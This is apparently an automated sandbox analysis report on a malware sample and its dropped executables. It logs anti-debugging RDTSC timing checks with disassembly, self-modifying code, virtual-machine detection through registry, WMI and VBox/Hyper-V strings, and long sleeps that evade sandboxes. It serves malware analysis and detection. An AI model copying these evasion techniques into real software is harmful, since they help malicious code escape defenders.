Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50800FA second address: 5080124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 mov ax, F3B9h 0x00000014 popad 0x00000015 xchg eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB7D50A5EDBh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080124 second address: 508012A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508012A second address: 508012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508012E second address: 5080188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB7D509B84Eh 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FB7D509B850h 0x00000014 xchg eax, ebx 0x00000015 jmp 00007FB7D509B850h 0x0000001a push eax 0x0000001b jmp 00007FB7D509B84Bh 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FB7D509B850h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080188 second address: 5080197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080197 second address: 508019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508019D second address: 50801A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50801A1 second address: 50801A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50801A5 second address: 50801E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b jmp 00007FB7D50A5EE7h 0x00000010 xchg eax, esi 0x00000011 jmp 00007FB7D50A5EE6h 0x00000016 push eax 0x00000017 pushad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50801E3 second address: 5080291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FB7D509B853h 0x0000000b or esi, 50CB243Eh 0x00000011 jmp 00007FB7D509B859h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FB7D509B84Ch 0x00000020 adc si, 3938h 0x00000025 jmp 00007FB7D509B84Bh 0x0000002a popfd 0x0000002b mov edi, eax 0x0000002d popad 0x0000002e mov esi, dword ptr [ebp+08h] 0x00000031 jmp 00007FB7D509B852h 0x00000036 xchg eax, edi 0x00000037 jmp 00007FB7D509B850h 0x0000003c push eax 0x0000003d jmp 00007FB7D509B84Bh 0x00000042 xchg eax, edi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov eax, edx 0x00000048 call 00007FB7D509B857h 0x0000004d pop eax 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080291 second address: 50802AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EE5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50802AA second address: 50802AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50802AE second address: 5080305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FB7D50A5EDDh 0x0000000f je 00007FB846F54226h 0x00000015 jmp 00007FB7D50A5EDEh 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 pushad 0x00000022 push esi 0x00000023 mov bx, EE00h 0x00000027 pop ebx 0x00000028 mov eax, 5E9C4CF5h 0x0000002d popad 0x0000002e je 00007FB846F54214h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 call 00007FB7D50A5EDDh 0x0000003c pop esi 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080305 second address: 508030B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508030B second address: 508030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508030F second address: 508035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f call 00007FB7D509B84Dh 0x00000014 pushfd 0x00000015 jmp 00007FB7D509B850h 0x0000001a adc si, 01D8h 0x0000001f jmp 00007FB7D509B84Bh 0x00000024 popfd 0x00000025 pop ecx 0x00000026 popad 0x00000027 or edx, dword ptr [ebp+0Ch] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ebx, ecx 0x0000002f mov si, D023h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508035C second address: 5080387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080387 second address: 508038C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508038C second address: 5080392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080392 second address: 5080414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB846F49B34h 0x0000000e jmp 00007FB7D509B859h 0x00000013 test byte ptr [esi+48h], 00000001h 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FB7D509B84Ch 0x0000001e sbb cx, 8828h 0x00000023 jmp 00007FB7D509B84Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FB7D509B858h 0x0000002f adc ecx, 13DA3A88h 0x00000035 jmp 00007FB7D509B84Bh 0x0000003a popfd 0x0000003b popad 0x0000003c jne 00007FB846F49ADFh 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080414 second address: 5080418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080418 second address: 508041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508041E second address: 5080424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080424 second address: 5080428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070890 second address: 50708D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB7D50A5EE1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FB7D50A5EDEh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov al, 62h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50708D5 second address: 507094D instructions: 0x00000000 rdtsc 0x00000002 call 00007FB7D509B859h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b movsx edx, ax 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 and esp, FFFFFFF8h 0x00000015 pushad 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FB7D509B850h 0x0000001d adc ch, FFFFFFD8h 0x00000020 jmp 00007FB7D509B84Bh 0x00000025 popfd 0x00000026 call 00007FB7D509B858h 0x0000002b pop eax 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FB7D509B851h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507094D second address: 5070974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 jmp 00007FB7D50A5EDCh 0x0000000d push eax 0x0000000e jmp 00007FB7D50A5EDBh 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070974 second address: 5070978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070978 second address: 5070993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070993 second address: 50709AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B854h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50709AB second address: 5070A3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FB7D50A5EE6h 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007FB7D50A5EE1h 0x00000018 jmp 00007FB7D50A5EE0h 0x0000001d pop ecx 0x0000001e pushfd 0x0000001f jmp 00007FB7D50A5EDBh 0x00000024 and cx, E22Eh 0x00000029 jmp 00007FB7D50A5EE9h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 mov ebx, ecx 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a pushad 0x0000003b movzx eax, dx 0x0000003e mov bh, B3h 0x00000040 popad 0x00000041 sub ebx, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070A3C second address: 5070A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070A40 second address: 5070A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070A46 second address: 5070A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 2Bh 0x00000005 mov esi, 41B3B523h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 call 00007FB7D509B851h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070A6C second address: 5070A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 je 00007FB846F5B7F2h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070A7E second address: 5070A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070A82 second address: 5070A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070A98 second address: 5070A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070A9E second address: 5070AF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 jmp 00007FB7D50A5EDEh 0x00000017 mov ecx, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FB7D50A5EDDh 0x00000022 sbb ax, 7696h 0x00000027 jmp 00007FB7D50A5EE1h 0x0000002c popfd 0x0000002d movzx esi, bx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070AF4 second address: 5070AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070AFA second address: 5070AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070AFE second address: 5070BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B854h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FB846F510D1h 0x00000011 jmp 00007FB7D509B850h 0x00000016 test byte ptr [76FB6968h], 00000002h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB7D509B84Eh 0x00000024 sbb ax, 1048h 0x00000029 jmp 00007FB7D509B84Bh 0x0000002e popfd 0x0000002f push esi 0x00000030 mov ax, dx 0x00000033 pop ebx 0x00000034 popad 0x00000035 jne 00007FB846F510A0h 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FB7D509B84Ch 0x00000042 sbb ecx, 3F7052A8h 0x00000048 jmp 00007FB7D509B84Bh 0x0000004d popfd 0x0000004e jmp 00007FB7D509B858h 0x00000053 popad 0x00000054 mov edx, dword ptr [ebp+0Ch] 0x00000057 jmp 00007FB7D509B850h 0x0000005c xchg eax, ebx 0x0000005d pushad 0x0000005e mov cx, 644Dh 0x00000062 push eax 0x00000063 push edx 0x00000064 mov ebx, esi 0x00000066 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 76EAAE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 920D62 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9A9F08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 74EAAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 900D62 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 989F08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Special instruction interceptor: First address: 65AC40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Special instruction interceptor: First address: 65AB58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Special instruction interceptor: First address: 658196 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Special instruction interceptor: First address: 808C32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Special instruction interceptor: First address: 6E5E08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Special instruction interceptor: First address: 50FC4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Special instruction interceptor: First address: 74783E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Special instruction interceptor: First address: 3ADC0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Special instruction interceptor: First address: 54BEA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Special instruction interceptor: First address: 5583C2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Special instruction interceptor: First address: 5E4435 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Special instruction interceptor: First address: 63DDC0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Special instruction interceptor: First address: 657BEA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Special instruction interceptor: First address: 3B0E4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Special instruction interceptor: First address: 65883C2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Special instruction interceptor: First address: 6614435 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Special instruction interceptor: First address: 176E113 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Special instruction interceptor: First address: 15C53B2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Special instruction interceptor: First address: 17935F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Special instruction interceptor: First address: 177E55E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Special instruction interceptor: First address: 17F43E0 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Memory allocated: 1540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Memory allocated: 4FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 6E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 6FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 8FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Memory allocated: 5150000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Memory allocated: 5470000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Memory allocated: 7470000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_050F0D2C rdtsc

0_2_050F0D2C

Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 894	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1047	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1034	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 364	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1048	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3992	Thread sleep count: 894 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3992	Thread sleep time: -1788894s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1012	Thread sleep count: 1047 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1012	Thread sleep time: -2095047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856	Thread sleep count: 294 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856	Thread sleep time: -8820000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3852	Thread sleep count: 1030 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3852	Thread sleep time: -2061030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3512	Thread sleep count: 1034 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3512	Thread sleep time: -2069034s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6112	Thread sleep count: 364 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6112	Thread sleep time: -728364s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4412	Thread sleep count: 1048 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4412	Thread sleep time: -2097048s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 4420	Thread sleep time: -44022s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 5304	Thread sleep time: -44022s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 7788	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 7680	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 7692	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe TID: 3844	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Thread delayed: delay time: 922337203685477

Source: skotes.exe, skotes.exe, 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, a6f0d09f38.exe, a6f0d09f38.exe, 0000000D.00000002.2942271609.00000000007E2000.00000040.00000001.01000000.0000000E.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987765650.000000000655D000.00000040.00000800.00020000.00000000.sdmp, b5da647ae3.exe, b5da647ae3.exe, 0000000E.00000002.2641791818.000000000069B000.00000040.00000001.01000000.0000000F.sdmp, 8b82d73f70.exe, 00000020.00000002.2916077534.000000000052D000.00000040.00000001.01000000.0000001A.sdmp, 98a7b9f337.exe, 00000022.00000002.2962320417.000000000174F000.00000040.00000001.01000000.0000001B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: firefox.exe, 0000001E.00000002.2955897457.000001C8C37BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW "
Source: 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW"z
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWO
Source: firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
